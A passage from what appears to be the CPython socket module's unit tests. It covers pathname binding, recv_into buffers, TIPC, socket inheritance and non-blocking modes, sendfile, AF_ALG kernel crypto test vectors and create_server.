self.assertEqual(self.sock.getsockname(), path)
def testBytesAddr(self):
# Test binding to a bytes pathname.
path = os.path.abspath(os_helper.TESTFN)
self.bind(self.sock, self.encoded(path))
self.addCleanup(os_helper.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testSurrogateescapeBind(self):
# Test binding to a valid non-ASCII pathname, with the
# non-ASCII bytes supplied using surrogateescape encoding.
path = os.path.abspath(os_helper.TESTFN_UNICODE)
b = self.encoded(path)
self.bind(self.sock, b.decode("ascii", "surrogateescape"))
self.addCleanup(os_helper.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testUnencodableAddr(self):
# Test binding to a pathname that cannot be encoded in the
# file system encoding.
if os_helper.TESTFN_UNENCODABLE is None:
self.skipTest("No unencodable filename available")
path = os.path.abspath(os_helper.TESTFN_UNENCODABLE)
self.bind(self.sock, path)
self.addCleanup(os_helper.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
class BufferIOTest(SocketConnectedTest):
"""
Test the buffer versions of socket.recv() and socket.send().
"""
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecvIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvIntoBytearray(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoBytearray = _testRecvIntoArray
def testRecvIntoMemoryview(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoMemoryview = _testRecvIntoArray
def testRecvFromIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvFromIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvFromIntoBytearray(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoBytearray = _testRecvFromIntoArray
def testRecvFromIntoMemoryview(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoMemoryview = _testRecvFromIntoArray
def testRecvFromIntoSmallBuffer(self):
# See issue #20246.
buf = bytearray(8)
self.assertRaises(ValueError, self.cli_conn.recvfrom_into, buf, 1024)
def _testRecvFromIntoSmallBuffer(self):
self.serv_conn.send(MSG)
def testRecvFromIntoEmptyBuffer(self):
buf = bytearray()
self.cli_conn.recvfrom_into(buf)
self.cli_conn.recvfrom_into(buf, 0)
_testRecvFromIntoEmptyBuffer = _testRecvFromIntoArray
TIPC_STYPE = 2000
TIPC_LOWER = 200
TIPC_UPPER = 210
def isTipcAvailable():
"""Check if the TIPC module is loaded
The TIPC module is not loaded automatically on Ubuntu and probably
other Linux distros.
"""
if not hasattr(socket, "AF_TIPC"):
return False
try:
f = open("/proc/modules", encoding="utf-8")
except (FileNotFoundError, IsADirectoryError, PermissionError):
# It's ok if the file does not exist, is a directory or if we
# have not the permission to read it.
return False
with f:
for line in f:
if line.startswith("tipc "):
return True
return False
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCTest(unittest.TestCase):
def testRDM(self):
srv = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
cli = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
self.addCleanup(srv.close)
self.addCleanup(cli.close)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
srv.bind(srvaddr)
sendaddr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
cli.sendto(MSG, sendaddr)
msg, recvaddr = srv.recvfrom(1024)
self.assertEqual(cli.getsockname(), recvaddr)
self.assertEqual(msg, MSG)
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCThreadableTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName = 'runTest'):
unittest.TestCase.__init__(self, methodName = methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.srv = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.srv.close)
self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
self.srv.bind(srvaddr)
self.srv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.srv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
# There is a hittable race between serverExplicitReady() and the
# accept() call; sleep a little while to avoid it, otherwise
# we could get an exception
time.sleep(0.1)
self.cli = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
addr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
self.cli.connect(addr)
self.cliaddr = self.cli.getsockname()
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
self.assertEqual(self.cliaddr, self.connaddr)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class ContextManagersTest(ThreadedTCPSocketTest):
def _testSocketClass(self):
# base test
with socket.socket() as sock:
self.assertFalse(sock._closed)
self.assertTrue(sock._closed)
# close inside with block
with socket.socket() as sock:
sock.close()
self.assertTrue(sock._closed)
# exception inside with block
with socket.socket() as sock:
self.assertRaises(OSError, sock.sendall, b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionBase(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionBase(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
self.assertFalse(sock._closed)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionClose(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionClose(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
sock.close()
self.assertTrue(sock._closed)
self.assertRaises(OSError, sock.sendall, b'foo')
class InheritanceTest(unittest.TestCase):
@unittest.skipUnless(hasattr(socket, "SOCK_CLOEXEC"),
"SOCK_CLOEXEC not defined")
@support.requires_linux_version(2, 6, 28)
def test_SOCK_CLOEXEC(self):
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_CLOEXEC) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertFalse(s.get_inheritable())
def test_default_inheritable(self):
sock = socket.socket()
with sock:
self.assertEqual(sock.get_inheritable(), False)
def test_dup(self):
sock = socket.socket()
with sock:
newsock = sock.dup()
sock.close()
with newsock:
self.assertEqual(newsock.get_inheritable(), False)
def test_set_inheritable(self):
sock = socket.socket()
with sock:
sock.set_inheritable(True)
self.assertEqual(sock.get_inheritable(), True)
sock.set_inheritable(False)
self.assertEqual(sock.get_inheritable(), False)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipIf(sys.platform == 'OpenVMS', "OpenVMS has invalid F_SETFD implementation for sockets")
def test_get_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(sock.get_inheritable(), False)
# clear FD_CLOEXEC flag
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
flags &= ~fcntl.FD_CLOEXEC
fcntl.fcntl(fd, fcntl.F_SETFD, flags)
self.assertEqual(sock.get_inheritable(), True)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_set_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
fcntl.FD_CLOEXEC)
sock.set_inheritable(True)
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
0)
def test_socketpair(self):
s1, s2 = socket.socketpair()
self.addCleanup(s1.close)
self.addCleanup(s2.close)
self.assertEqual(s1.get_inheritable(), False)
self.assertEqual(s2.get_inheritable(), False)
@unittest.skipUnless(hasattr(socket, "SOCK_NONBLOCK"),
"SOCK_NONBLOCK not defined")
class NonblockConstantTest(unittest.TestCase):
def checkNonblock(self, s, nonblock=True, timeout=0.0):
if nonblock:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), timeout)
self.assertTrue(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
if timeout == 0:
# timeout == 0: means that getblocking() must be False.
self.assertFalse(s.getblocking())
else:
# If timeout > 0, the socket will be in a "blocking" mode
# from the standpoint of the Python API. For Python socket
# object, "blocking" means that operations like 'sock.recv()'
# will block. Internally, file descriptors for
# "blocking" Python sockets *with timeouts* are in a
# *non-blocking* mode, and 'sock.recv()' uses 'select()'
# and handles EWOULDBLOCK/EAGAIN to enforce the timeout.
self.assertTrue(s.getblocking())
else:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), None)
self.assertFalse(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
self.assertTrue(s.getblocking())
@support.requires_linux_version(2, 6, 28)
def test_SOCK_NONBLOCK(self):
# a lot of it seems silly and redundant, but I wanted to test that
# changing back and forth worked ok
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK) as s:
self.checkNonblock(s)
s.setblocking(True)
self.checkNonblock(s, nonblock=False)
s.setblocking(False)
self.checkNonblock(s)
s.settimeout(None)
self.checkNonblock(s, nonblock=False)
s.settimeout(2.0)
self.checkNonblock(s, timeout=2.0)
s.setblocking(True)
self.checkNonblock(s, nonblock=False)
# defaulttimeout
t = socket.getdefaulttimeout()
socket.setdefaulttimeout(0.0)
with socket.socket() as s:
self.checkNonblock(s)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(2.0)
with socket.socket() as s:
self.checkNonblock(s, timeout=2.0)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(t)
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(multiprocessing, "need multiprocessing")
class TestSocketSharing(SocketTCPTest):
# This must be classmethod and not staticmethod or multiprocessing
# won't be able to bootstrap it.
@classmethod
def remoteProcessServer(cls, q):
# Recreate socket from shared data
sdata = q.get()
message = q.get()
s = socket.fromshare(sdata)
s2, c = s.accept()
# Send the message
s2.sendall(message)
s2.close()
s.close()
def testShare(self):
# Transfer the listening server socket to another process
# and service it from there.
# Create process:
q = multiprocessing.Queue()
p = multiprocessing.Process(target=self.remoteProcessServer, args=(q,))
p.start()
# Get the shared socket data
data = self.serv.share(p.pid)
# Pass the shared socket to the other process
addr = self.serv.getsockname()
self.serv.close()
q.put(data)
# The data that the server will send us
message = b"slapmahfro"
q.put(message)
# Connect
s = socket.create_connection(addr)
# listen for the data
m = []
while True:
data = s.recv(100)
if not data:
break
m.append(data)
s.close()
received = b"".join(m)
self.assertEqual(received, message)
p.join()
def testShareLength(self):
data = self.serv.share(os.getpid())
self.assertRaises(ValueError, socket.fromshare, data[:-1])
self.assertRaises(ValueError, socket.fromshare, data+b"foo")
def compareSockets(self, org, other):
# socket sharing is expected to work only for blocking socket
# since the internal python timeout value isn't transferred.
self.assertEqual(org.gettimeout(), None)
self.assertEqual(org.gettimeout(), other.gettimeout())
self.assertEqual(org.family, other.family)
self.assertEqual(org.type, other.type)
# If the user specified "0" for proto, then
# internally windows will have picked the correct value.
# Python introspection on the socket however will still return
# 0. For the shared socket, the python value is recreated
# from the actual value, so it may not compare correctly.
if org.proto != 0:
self.assertEqual(org.proto, other.proto)
def testShareLocal(self):
data = self.serv.share(os.getpid())
s = socket.fromshare(data)
try:
self.compareSockets(self.serv, s)
finally:
s.close()
def testTypes(self):
families = [socket.AF_INET, socket.AF_INET6]
types = [socket.SOCK_STREAM, socket.SOCK_DGRAM]
for f in families:
for t in types:
try:
source = socket.socket(f, t)
except OSError:
continue # This combination is not supported
try:
data = source.share(os.getpid())
shared = socket.fromshare(data)
try:
self.compareSockets(source, shared)
finally:
shared.close()
finally:
source.close()
class SendfileUsingSendTest(ThreadedTCPSocketTest):
"""
Test the send() implementation of socket.sendfile().
"""
FILESIZE = (10 * 1024 * 1024) # 10 MiB
BUFSIZE = 8192
FILEDATA = b""
TIMEOUT = support.LOOPBACK_TIMEOUT
@classmethod
def setUpClass(cls):
def chunks(total, step):
assert total >= step
while total > step:
yield step
total -= step
if total:
yield total
chunk = b"".join([random.choice(string.ascii_letters).encode()
for i in range(cls.BUFSIZE)])
with open(os_helper.TESTFN, 'wb') as f:
for csize in chunks(cls.FILESIZE, cls.BUFSIZE):
f.write(chunk)
with open(os_helper.TESTFN, 'rb') as f:
cls.FILEDATA = f.read()
assert len(cls.FILEDATA) == cls.FILESIZE
@classmethod
def tearDownClass(cls):
os_helper.unlink(os_helper.TESTFN)
def accept_conn(self):
self.serv.settimeout(support.LONG_TIMEOUT)
conn, addr = self.serv.accept()
conn.settimeout(self.TIMEOUT)
self.addCleanup(conn.close)
return conn
def recv_data(self, conn):
received = []
while True:
chunk = conn.recv(self.BUFSIZE)
if not chunk:
break
received.append(chunk)
return b''.join(received)
def meth_from_sock(self, sock):
# Depending on the mixin class being run return either send()
# or sendfile() method implementation.
return getattr(sock, "_sendfile_use_send")
# regular file
def _testRegularFile(self):
address = self.serv.getsockname()
file = open(os_helper.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
def testRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# non regular file
def _testNonRegularFile(self):
address = self.serv.getsockname()
file = io.BytesIO(self.FILEDATA)
with socket.create_connection(address) as sock, file as file:
sent = sock.sendfile(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
self.assertRaises(socket._GiveupOnSendfile,
sock._sendfile_use_sendfile, file)
def testNonRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# empty file
def _testEmptyFileSend(self):
address = self.serv.getsockname()
filename = os_helper.TESTFN + "2"
with open(filename, 'wb'):
self.addCleanup(os_helper.unlink, filename)
file = open(filename, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, 0)
self.assertEqual(file.tell(), 0)
def testEmptyFileSend(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(data, b"")
# offset
def _testOffset(self):
address = self.serv.getsockname()
file = open(os_helper.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file, offset=5000)
self.assertEqual(sent, self.FILESIZE - 5000)
self.assertEqual(file.tell(), self.FILESIZE)
def testOffset(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE - 5000)
self.assertEqual(data, self.FILEDATA[5000:])
# count
def _testCount(self):
address = self.serv.getsockname()
file = open(os_helper.TESTFN, 'rb')
sock = socket.create_connection(address,
timeout=support.LOOPBACK_TIMEOUT)
with sock, file:
count = 5000007
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCount(self):
count = 5000007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count small
def _testCountSmall(self):
address = self.serv.getsockname()
file = open(os_helper.TESTFN, 'rb')
sock = socket.create_connection(address,
timeout=support.LOOPBACK_TIMEOUT)
with sock, file:
count = 1
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCountSmall(self):
count = 1
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count + offset
def _testCountWithOffset(self):
address = self.serv.getsockname()
file = open(os_helper.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 100007
meth = self.meth_from_sock(sock)
sent = meth(file, offset=2007, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count + 2007)
def testCountWithOffset(self):
count = 100007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[2007:count+2007])
# non blocking sockets are not supposed to work
def _testNonBlocking(self):
address = self.serv.getsockname()
file = open(os_helper.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
sock.setblocking(False)
meth = self.meth_from_sock(sock)
self.assertRaises(ValueError, meth, file)
self.assertRaises(ValueError, sock.sendfile, file)
def testNonBlocking(self):
conn = self.accept_conn()
if conn.recv(8192):
self.fail('was not supposed to receive any data')
# timeout (non-triggered)
def _testWithTimeout(self):
address = self.serv.getsockname()
file = open(os_helper.TESTFN, 'rb')
sock = socket.create_connection(address,
timeout=support.LOOPBACK_TIMEOUT)
with sock, file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
def testWithTimeout(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# timeout (triggered)
def _testWithTimeoutTriggeredSend(self):
address = self.serv.getsockname()
with open(os_helper.TESTFN, 'rb') as file:
with socket.create_connection(address) as sock:
sock.settimeout(0.01)
meth = self.meth_from_sock(sock)
self.assertRaises(TimeoutError, meth, file)
def testWithTimeoutTriggeredSend(self):
conn = self.accept_conn()
conn.recv(88192)
# errors
def _test_errors(self):
pass
def test_errors(self):
with open(os_helper.TESTFN, 'rb') as file:
with socket.socket(type=socket.SOCK_DGRAM) as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "SOCK_STREAM", meth, file)
with open(os_helper.TESTFN, encoding="utf-8") as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "binary mode", meth, file)
with open(os_helper.TESTFN, 'rb') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count='2')
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count=0.1)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=0)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=-1)
@unittest.skipUnless(hasattr(os, "sendfile"),
'os.sendfile() required for this test.')
class SendfileUsingSendfileTest(SendfileUsingSendTest):
"""
Test the sendfile() implementation of socket.sendfile().
"""
def meth_from_sock(self, sock):
return getattr(sock, "_sendfile_use_sendfile")
@unittest.skipUnless(HAVE_SOCKET_ALG, 'AF_ALG required')
class LinuxKernelCryptoAPI(unittest.TestCase):
# tests for AF_ALG
def create_alg(self, typ, name):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
try:
sock.bind((typ, name))
except FileNotFoundError as e:
# type / algorithm is not available
sock.close()
raise unittest.SkipTest(str(e), typ, name)
else:
return sock
# bpo-31705: On kernel older than 4.5, sendto() failed with ENOKEY,
# at least on ppc64le architecture
@support.requires_linux_version(4, 5)
def test_sha256(self):
expected = bytes.fromhex("ba7816bf8f01cfea414140de5dae2223b00361a396"
"177a9cb410ff61f20015ad")
with self.create_alg('hash', 'sha256') as algo:
op, _ = algo.accept()
with op:
op.sendall(b"abc")
self.assertEqual(op.recv(512), expected)
op, _ = algo.accept()
with op:
op.send(b'a', socket.MSG_MORE)
op.send(b'b', socket.MSG_MORE)
op.send(b'c', socket.MSG_MORE)
op.send(b'')
self.assertEqual(op.recv(512), expected)
def test_hmac_sha1(self):
expected = bytes.fromhex("effcdf6ae5eb2fa2d27416d5f184df9c259a7c79")
with self.create_alg('hash', 'hmac(sha1)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, b"Jefe")
op, _ = algo.accept()
with op:
op.sendall(b"what do ya want for nothing?")
self.assertEqual(op.recv(512), expected)
# Although it should work with 3.19 and newer the test blocks on
# Ubuntu 15.10 with Kernel 4.2.0-19.
@support.requires_linux_version(4, 3)
def test_aes_cbc(self):
key = bytes.fromhex('06a9214036b8a15b512e03d534120006')
iv = bytes.fromhex('3dafba429d9eb430b422da802c9fac41')
msg = b"Single block msg"
ciphertext = bytes.fromhex('e353779c1079aeb82708942dbe77181a')
msglen = len(msg)
with self.create_alg('skcipher', 'cbc(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
flags=socket.MSG_MORE)
op.sendall(msg)
self.assertEqual(op.recv(msglen), ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([ciphertext],
op=socket.ALG_OP_DECRYPT, iv=iv)
self.assertEqual(op.recv(msglen), msg)
# long message
multiplier = 1024
longmsg = [msg] * multiplier
op, _ = algo.accept()
with op:
op.sendmsg_afalg(longmsg,
op=socket.ALG_OP_ENCRYPT, iv=iv)
enc = op.recv(msglen * multiplier)
self.assertEqual(len(enc), msglen * multiplier)
self.assertEqual(enc[:msglen], ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([enc],
op=socket.ALG_OP_DECRYPT, iv=iv)
dec = op.recv(msglen * multiplier)
self.assertEqual(len(dec), msglen * multiplier)
self.assertEqual(dec, msg * multiplier)
@support.requires_linux_version(4, 9) # see issue29324
def test_aead_aes_gcm(self):
key = bytes.fromhex('c939cc13397c1d37de6ae0e1cb7c423c')
iv = bytes.fromhex('b3d8cc017cbb89b39e0f67e2')
plain = bytes.fromhex('c3b3c41f113a31b73d9a5cd432103069')
assoc = bytes.fromhex('24825602bd12a984e0092d3e448eda5f')
expected_ct = bytes.fromhex('93fe7d9e9bfd10348a5606e5cafa7354')
expected_tag = bytes.fromhex('0032a1dc85f1c9786925a2e71d8272dd')
taglen = len(expected_tag)
assoclen = len(assoc)
with self.create_alg('aead', 'gcm(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_AEAD_AUTHSIZE,
None, taglen)
# send assoc, plain and tag buffer in separate steps
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen, flags=socket.MSG_MORE)
op.sendall(assoc, socket.MSG_MORE)
op.sendall(plain)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# now with msg
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg_afalg([msg], op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# create anc data manually
pack_uint32 = struct.Struct('I').pack
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg(
[msg],
([socket.SOL_ALG, socket.ALG_SET_OP, pack_uint32(socket.ALG_OP_ENCRYPT)],
[socket.SOL_ALG, socket.ALG_SET_IV, pack_uint32(len(iv)) + iv],
[socket.SOL_ALG, socket.ALG_SET_AEAD_ASSOCLEN, pack_uint32(assoclen)],
)
)
res = op.recv(len(msg) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# decrypt and verify
op, _ = algo.accept()
with op:
msg = assoc + expected_ct + expected_tag
op.sendmsg_afalg([msg], op=socket.ALG_OP_DECRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(len(msg) - taglen)
self.assertEqual(plain, res[assoclen:])
@support.requires_linux_version(4, 3) # see test_aes_cbc
def test_drbg_pr_sha256(self):
# deterministic random bit generator, prediction resistance, sha256
with self.create_alg('rng', 'drbg_pr_sha256') as algo:
extra_seed = os.urandom(32)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, extra_seed)
op, _ = algo.accept()
with op:
rn = op.recv(32)
self.assertEqual(len(rn), 32)
def test_sendmsg_afalg_args(self):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
with sock:
with self.assertRaises(TypeError):
sock.sendmsg_afalg()
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(1)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=-1)
def test_length_restriction(self):
# bpo-35050, off-by-one error in length check
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
self.addCleanup(sock.close)
# salg_type[14]
with self.assertRaises(FileNotFoundError):
sock.bind(("t" * 13, "name"))
with self.assertRaisesRegex(ValueError, "type too long"):
sock.bind(("t" * 14, "name"))
# salg_name[64]
with self.assertRaises(FileNotFoundError):
sock.bind(("type", "n" * 63))
with self.assertRaisesRegex(ValueError, "name too long"):
sock.bind(("type", "n" * 64))
@unittest.skipUnless(sys.platform.startswith("win"), "requires Windows")
class TestMSWindowsTCPFlags(unittest.TestCase):
knownTCPFlags = {
# available since long time ago
'TCP_MAXSEG',
'TCP_NODELAY',
# available starting with Windows 10 1607
'TCP_FASTOPEN',
# available starting with Windows 10 1703
'TCP_KEEPCNT',
# available starting with Windows 10 1709
'TCP_KEEPIDLE',
'TCP_KEEPINTVL'
}
def test_new_tcp_flags(self):
provided = [s for s in dir(socket) if s.startswith('TCP')]
unknown = [s for s in provided if s not in self.knownTCPFlags]
self.assertEqual([], unknown,
"New TCP flags were discovered. See bpo-32394 for more information")
class CreateServerTest(unittest.TestCase):
def test_address(self):
port = socket_helper.find_unused_port()
with socket.create_server(("127.0.0.1", port)) as sock:
self.assertEqual(sock.getsockname()[0], "127.0.0.1")
self.assertEqual(sock.getsockname()[1], port)
if socket_helper.IPV6_ENABLED:
with socket.create_server(("::1", port),
family=socket.AF_INET6) as sock:
self.assertEqual(sock.getsockname()[0], "::1")
self.assertEqual(sock.getsockname()[1], port)
def test_family_and_type(self):
with socket.create_server(("127.0.0.1", 0)) as sock:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
if socket_helper.IPV6_ENABLED:
with socket.create_server(("::1", 0), family=socket.AF_INET6) as s:
self.assertEqual(s.family, socket.AF_INET6)
self.assertEqual(sock.type, socket.SOCK_STREAM)
def test_reuse_port(self):
if not hasattr(socket, "SO_REUSEPORT"):
with self.assertRaises(ValueError):
socket.create_server(("localhost", 0), reuse_port=True)
else:
with socket.create_server(("localhost", 0)) as sock:
opt = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT)
self.assertEqual(opt, 0)
with socket.create_server(("localhost", 0), reuse_port=True) as sock:
opt = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT)
self.assertNotEqual(opt, 0)
@unittest.skipIf(not hasattr(_socket, 'IPPROTO_IPV6') or
not hasattr(_socket, 'IPV6_V6ONLY'),
"IPV6_V6ONLY option not supported")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test')
def test_ipv6_only_default(self):
with socket.create_server(("::1", 0), family=socket.AF_INET6) as sock:
assert sock.getsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY)
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test')
def test_dualstack_ipv6_family(self):
with socket.create_server(("::1", 0), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.assertEqual(sock.family, socket.AF_INET6)
class CreateServerFunctionalTest(unittest.TestCase):
timeout = support.LOOPBACK_TIMEOUT
def setUp(self):
self.thread = None
def tearDown(self):
if self.thread is not None:
self.thread.join(self.timeout)
def echo_server(self, sock):
def run(sock):
with sock:
conn, _ = sock.accept()
with conn:
event.wait(self.timeout)
msg = conn.recv(1024)
if not msg:
return
conn.sendall(msg)
event = threading.Event()
sock.settimeout(self.timeout)
self.thread = threading.Thread(target=run, args=(sock, ))
self.thread.start()
event.set()
def echo_client(self, addr, family):
with socket.socket(family=family) as sock:
sock.settimeout(self.timeout)
